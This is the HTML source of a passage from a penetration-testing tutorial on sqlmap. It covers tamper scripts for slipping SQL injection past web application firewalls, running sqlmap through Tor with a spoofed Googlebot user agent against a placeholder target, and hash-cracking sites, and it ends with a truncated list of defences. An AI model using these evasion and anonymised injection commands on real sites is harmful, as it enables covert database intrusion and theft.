&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span style="box-sizing: border-box; color: black; font-family: Georgia, 'Times New Roman', serif;"&gt;&lt;a href="https://crackstation.net/" style="-webkit-transition: all 0.4s ease-in-out; box-sizing: border-box; color: #999999; text-decoration: none; transition: all 0.4s ease-in-out;"&gt;&lt;span lang="EN-US" style="box-sizing: border-box;"&gt;https://crackstation.net/&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="box-sizing: border-box;"&gt;&amp;nbsp;&lt;/span&gt;&lt;a href="http://www.onlinehashcrack.com/" style="-webkit-transition: all 0.4s ease-in-out; box-sizing: border-box; color: #999999; text-decoration: none; transition: all 0.4s ease-in-out;"&gt;&lt;span lang="EN-US" style="box-sizing: border-box;"&gt;http://www.onlinehashcrack.com/&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="box-sizing: border-box;"&gt;&lt;o:p style="box-sizing: border-box;"&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;&lt;br style="box-sizing: border-box;" /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;&lt;br style="box-sizing: border-box;" /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;b style="box-sizing: border-box;"&gt;&lt;span lang="EN-US" style="box-sizing: border-box;"&gt;&lt;span style="box-sizing: border-box; color: red; font-family: Georgia, 'Times New Roman', serif;"&gt;BEYOND THE BASICS&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span lang="EN-US" style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;Readers, lucky for us, there are some awesome tamper scripts for sqlmap, which can be found in the latest development version from the Subversion repository.&lt;o:p style="box-sizing: border-box;"&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;&lt;br style="box-sizing: border-box;" /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;strong style="box-sizing: border-box;"&gt;&lt;span lang="EN-US" style="background-color: white; box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;&lt;span style="box-sizing: border-box; color: #0c343d;"&gt;svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev&lt;/span&gt;&lt;o:p style="box-sizing: border-box;"&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/strong&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;&lt;br style="box-sizing: border-box;" /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;&lt;span lang="EN-US" style="box-sizing: border-box;"&gt;In fact the function of the tamper scripts is to modify the request in a way that will escape detection rules WAF (Web Application Firewall). In some cases it may be necessary to combine some tamper scripts together in order to fool the WAF. For a complete list of scripts for tampering, you may find&amp;nbsp;&lt;/span&gt;&lt;a href="https://svn.sqlmap.org/sqlmap/trunk/sqlmap/tamper/" style="-webkit-transition: all 0.4s ease-in-out; box-sizing: border-box; color: #999999; text-decoration: none; transition: all 0.4s ease-in-out;"&gt;&lt;span lang="EN-US" style="background-color: white; box-sizing: border-box;"&gt;https://svn.sqlmap.org/sqlmap/trunk/sqlmap/tamper/&lt;/span&gt;&lt;/a&gt;&lt;strong style="box-sizing: border-box;"&gt;&lt;span lang="EN-US" style="box-sizing: border-box; font-weight: normal;"&gt;&lt;o:p style="box-sizing: border-box;"&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/strong&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;&lt;br style="box-sizing: border-box;" /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span lang="EN-US" style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;Many enterprises often overlook the current vulnerabilities and rely only on the firewall for protection. Unfortunately, most, if not all firewalls can be bypassed. So gentlemen, I want to demonstrate how to use some of the new features of sqlmap to bypass WAF’s/IDS.&lt;o:p style="box-sizing: border-box;"&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;&lt;br style="box-sizing: border-box;" /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span lang="EN-US" style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;Well, I'll demonstrate some important scripts that are&amp;nbsp;&lt;b style="box-sizing: border-box;"&gt;charencode.py&lt;/b&gt;&amp;nbsp;and&amp;nbsp;&lt;b style="box-sizing: border-box;"&gt;charcodeencode.py&lt;/b&gt;&amp;nbsp;to work with MySQL.&lt;o:p style="box-sizing: border-box;"&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;&lt;v:shape id="Imagem_x0020_17" o:spid="_x0000_i1030" style="box-sizing: border-box; height: 85.5pt; visibility: visible; width: 487.5pt;" type="#_x0000_t75"&gt;&lt;v:imagedata o:title="" src="file:///C:\Users\REPSAN~1\AppData\Local\Temp\msohtmlclip1\01\clip_image011.png" style="box-sizing: border-box;"&gt;&lt;/v:imagedata&gt;&lt;/v:shape&gt;&lt;span lang="EN-US" style="box-sizing: border-box;"&gt;&lt;o:p style="box-sizing: border-box;"&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;&lt;br style="box-sizing: border-box;" /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span lang="EN-US" style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;&lt;b style="box-sizing: border-box;"&gt;&lt;span style="box-sizing: border-box; color: red;"&gt;Hands-on:&lt;/span&gt;&lt;/b&gt;&amp;nbsp;To begin using tamper scripts, you use the&amp;nbsp;&lt;b style="box-sizing: border-box;"&gt;--tamper&lt;/b&gt;&amp;nbsp;followed by the script name. In the example, we use the command:&lt;o:p style="box-sizing: border-box;"&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="background-color: white; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 13.5pt; margin: 0cm;"&gt;
&lt;span style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;&lt;v:shape id="Imagem_x0020_19" o:spid="_x0000_i1029" style="box-sizing: border-box; height: 206.25pt; visibility: visible; width: 523.5pt;" type="#_x0000_t75"&gt;&lt;v:imagedata o:title="" src="file:///C:\Users\REPSAN~1\AppData\Local\Temp\msohtmlclip1\01\clip_image012.png" style="box-sizing: border-box;"&gt;&lt;/v:imagedata&gt;&lt;/v:shape&gt;&lt;span lang="EN-US" style="box-sizing: border-box;"&gt;&lt;o:p style="box-sizing: border-box;"&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;&lt;br style="box-sizing: border-box;" /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span lang="EN-US" style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;Summary of&amp;nbsp;&lt;b style="box-sizing: border-box;"&gt;charencode.py&lt;/b&gt;&lt;o:p style="box-sizing: border-box;"&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span lang="EN-US" style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;Quite simply, this script is useful for ignoring very weak web application firewalls (WAF) …&lt;o:p style="box-sizing: border-box;"&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span lang="EN-US" style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;Another interesting function url-decode the request before processing it through their set of rules (:&lt;o:p style="box-sizing: border-box;"&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span lang="EN-US" style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;The web server will anyway go to url-decoded back version, concluding, it should work against any DBMS.&lt;o:p style="box-sizing: border-box;"&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;&lt;v:shape id="Imagem_x0020_20" o:spid="_x0000_i1028" style="box-sizing: border-box; height: 178.5pt; visibility: visible; width: 522pt;" type="#_x0000_t75"&gt;&lt;v:imagedata o:title="" src="file:///C:\Users\REPSAN~1\AppData\Local\Temp\msohtmlclip1\01\clip_image013.png" style="box-sizing: border-box;"&gt;&lt;/v:imagedata&gt;&lt;/v:shape&gt;&lt;span lang="EN-US" style="box-sizing: border-box;"&gt;&lt;o:p style="box-sizing: border-box;"&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;&lt;br style="box-sizing: border-box;" /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span lang="EN-US" style="box-sizing: border-box;"&gt;&lt;b style="box-sizing: border-box;"&gt;&lt;span style="box-sizing: border-box; color: red; font-family: Georgia, 'Times New Roman', serif;"&gt;Example to use:&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span lang="EN-US" style="background-color: white; box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;We will demonstrate the use of charunicodeencode.py for additional security. The vast number of organizations have deployed WAF. Guys, this is a tricky part to exploit such an environment. Well, standard SQL injection attack vectors will not work neither will the scripts.&lt;o:p style="box-sizing: border-box;"&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span lang="EN-US" style="background-color: white; box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;That is the reason we use tamper scripts, this facility known as “tamper scripts" in aid of a quiet way to bypass web application firewalls.&lt;/span&gt;&lt;br style="box-sizing: border-box;" /&gt;&lt;span lang="EN-US" style="background-color: white; box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;&lt;br style="box-sizing: border-box;" /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span lang="EN-US" style="background-color: white; box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;Guys, I have demonstrated just a few of the many tamper scripts. We highly recommend testing them out as each one can be used in different situations.&lt;/span&gt;&lt;br style="box-sizing: border-box;" /&gt;&lt;span lang="EN-US" style="background-color: white; box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;&lt;br style="box-sizing: border-box;" /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span lang="EN-US" style="background-color: white; box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;&lt;b style="box-sizing: border-box;"&gt;Notes:&lt;/b&gt;&amp;nbsp;That's not a tool for "script kiddies" it is of utmost importance to make use of such a powerful tool responsibly and maturely.&lt;o:p style="box-sizing: border-box;"&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span lang="EN-US" style="background-color: white; box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;Caution if used in the wrong way, sqlmap generates many queries and can affect the performance of the database target, moreover strange entries and changes to the database schema are possible if the tool is not controlled and used extensively.&lt;o:p style="box-sizing: border-box;"&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;&lt;br style="box-sizing: border-box;" /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;b style="box-sizing: border-box;"&gt;&lt;span lang="EN-US" style="box-sizing: border-box; color: red; font-family: Georgia, 'Times New Roman', serif;"&gt;PARTLY ANONYMOUS&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span lang="EN-US" style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;I will demonstrate to you how to use sqlmap with The Onion Router for the protection of IP, DNS, etc... In your Linux, in the terminal type:&lt;o:p style="box-sizing: border-box;"&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;b style="box-sizing: border-box;"&gt;&lt;span lang="EN-US" style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;$ sudo apt-get install tor tor-geoip&lt;o:p style="box-sizing: border-box;"&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;&lt;br style="box-sizing: border-box;" /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span lang="EN-US" style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;After enter the sqlmap folder and type:&lt;o:p style="box-sizing: border-box;"&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;b style="box-sizing: border-box;"&gt;&lt;span lang="EN-US" style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;&lt;span style="box-sizing: border-box; color: #0c343d;"&gt;./sqlmap.py -u "http://www.targetvuln.com/index.php?cata_id=1" -b -a –tor --check-tor--user-agent="Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"&lt;/span&gt;&lt;o:p style="box-sizing: border-box;"&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;&lt;br style="box-sizing: border-box;" /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span lang="EN-US" style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;The argument&amp;nbsp;&lt;b style="box-sizing: border-box;"&gt;--tor&lt;/b&gt;&amp;nbsp;invokes the Tor to be used and the&amp;nbsp;&lt;b style="box-sizing: border-box;"&gt;--check-tor&lt;/b&gt;&amp;nbsp;checks if Tor is being used properly, if not, you will receive an error message in red at the terminal. The User Agent is the&amp;nbsp;&lt;b style="box-sizing: border-box;"&gt;googlebot&lt;/b&gt;, all your requests on the site will look like the Google bot doing a little visit.&lt;o:p style="box-sizing: border-box;"&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;&lt;br style="box-sizing: border-box;" /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span lang="EN-US" style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;TOR at SQLMap, we can set your TOR proxy for hiding the source from where the traffic or request is generated.&lt;o:p style="box-sizing: border-box;"&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;&lt;br style="box-sizing: border-box;" /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;&lt;b style="box-sizing: border-box;"&gt;&lt;span lang="EN-US" style="box-sizing: border-box;"&gt;–tor-port&lt;/span&gt;&lt;/b&gt;&lt;span lang="EN-US" style="box-sizing: border-box;"&gt;,&amp;nbsp;&lt;b style="box-sizing: border-box;"&gt;–tor-type&lt;/b&gt;&amp;nbsp;:&amp;nbsp; the parameter can help you out to set the TOR proxy manually.&lt;o:p style="box-sizing: border-box;"&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span lang="EN-US" style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;–&lt;b style="box-sizing: border-box;"&gt;check-tor&lt;/b&gt;&amp;nbsp;: the parameter will check if the tor setup is appropriate and functional.&lt;o:p style="box-sizing: border-box;"&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;&lt;br style="box-sizing: border-box;" /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span lang="EN-US" style="box-sizing: border-box; color: red; font-family: Georgia, 'Times New Roman', serif;"&gt;&lt;b style="box-sizing: border-box;"&gt;CONCLUSION:&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span lang="EN-US" style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;It is known that many targets have been explored through SQL Injection a few years ago when this threat was discovered, the injection form was "the nail". The pentester had to enter the codes manually, taking longer to complete the attack.&lt;o:p style="box-sizing: border-box;"&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span lang="EN-US" style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;Then came the development of programs that automated attack. Nowadays perhaps the best known of these programs is sqlmap.py. SQLMAP is a program of open source testing framework written in Python. It has full support for database systems: MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB and also supports 6 types of SQL Injection techniques.&lt;o:p style="box-sizing: border-box;"&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;&lt;br style="box-sizing: border-box;" /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;b style="box-sizing: border-box;"&gt;&lt;span lang="EN-US" style="box-sizing: border-box;"&gt;&lt;span style="box-sizing: border-box; color: red; font-family: Georgia, 'Times New Roman', serif;"&gt;SOLUTION:&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px; margin-left: 36pt; text-indent: -18pt;"&gt;
&lt;span style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;&lt;span lang="EN-US" style="box-sizing: border-box;"&gt;1.&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span lang="EN-US" style="box-sizing: border-box;"&gt;Correct the SQL server regularly.&lt;o:p style="box-sizing: border-box;"&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px; margin-left: 36pt; text-indent: -18pt;"&gt;
&lt;span style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;&lt;span lang="EN-US" style="box-sizing: border-box;"&gt;2.&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span lang="EN-US" style="box-sizing: border-box;"&gt;Limit the use of dynamic queries.&lt;o:p style="box-sizing: border-box;"&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px; margin-left: 36pt; text-indent: -18pt;"&gt;
&lt;span style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;&lt;span lang="EN-US" style="box-sizing: border-box;"&gt;3.&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span lang="EN-US" style="box-sizing: border-box;"&gt;Escape input data from users.&lt;o:p style="box-sizing: border-box;"&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px; margin-left: 36pt; text-indent: -18pt;"&gt;
